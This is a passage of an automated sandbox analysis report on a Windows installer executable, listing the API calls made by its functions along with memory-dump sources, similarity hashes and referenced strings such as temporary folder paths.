                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                    • String ID: Haste.n$
                                                                                                    • API String ID: 2987980305-3391731235
                                                                                                    • Opcode ID: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                    • Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
                                                                                                    • Opcode Fuzzy Hash: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                    • Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E
                                                                                                    APIs
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1354259210-0
                                                                                                    • Opcode ID: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                    • Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
                                                                                                    • Opcode Fuzzy Hash: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                    • Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                                                    • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                                                    • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                    • Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
                                                                                                    • Opcode Fuzzy Hash: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                    • Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                    • Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
                                                                                                    • Opcode Fuzzy Hash: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                    • Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                    • wsprintfA.USER32 ref: 00404A47
                                                                                                    • SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s
                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                    • Opcode ID: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                    • Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
                                                                                                    • Opcode Fuzzy Hash: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                    • Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • lstrlenA.KERNEL32(007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
                                                                                                    • GetFileAttributesA.KERNEL32(007A0970,007A0970,007A0970,007A0970,007A0970,007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$pz
                                                                                                    • API String ID: 3248276644-1269772899
                                                                                                    • Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                    • Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
                                                                                                    • Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                    • Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 2659869361-823278215
                                                                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                    • Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
                                                                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                    • Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102729457-0
                                                                                                    • Opcode ID: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
                                                                                                    • Instruction ID: 07a7c2fcb6e55b04e3e3d34d53389a9772e5beadce82dbb6bf9e24f56b5acc78
                                                                                                    • Opcode Fuzzy Hash: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
                                                                                                    • Instruction Fuzzy Hash: 91F05E30481624EFC621AB64FE0CA9B7B64BB44B41711893FF085B12F8C77808828BDC
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 0040519E
                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 004051EF
                                                                                                      • Part of subcall function 004041A4: SendMessageA.USER32(0001043E,00000000,00000000,00000000), ref: 004041B6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
                                                                                                    • Instruction ID: a815c8626c5111ac64f0cf4f46d81bc36f874ce80d1ab61a55fc5c00676d5aef
                                                                                                    • Opcode Fuzzy Hash: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
                                                                                                    • Instruction Fuzzy Hash: 1A015E31600608ABEF205F11DD84B9B376AEB84315F244137FA00791D0C7799D62DA69
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403873
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403852
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 1100898210-823278215
                                                                                                    • Opcode ID: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
                                                                                                    • Instruction ID: a47bf4f3c2a96a327e4b4819c0cefa3b0cf6e53b08830cce55d404a8342abc97
                                                                                                    • Opcode Fuzzy Hash: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
                                                                                                    • Instruction Fuzzy Hash: 22E01D3350112057C6616F55EE0475977AD5F49B26F06806BF880773514774AC534FDC
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405AB9
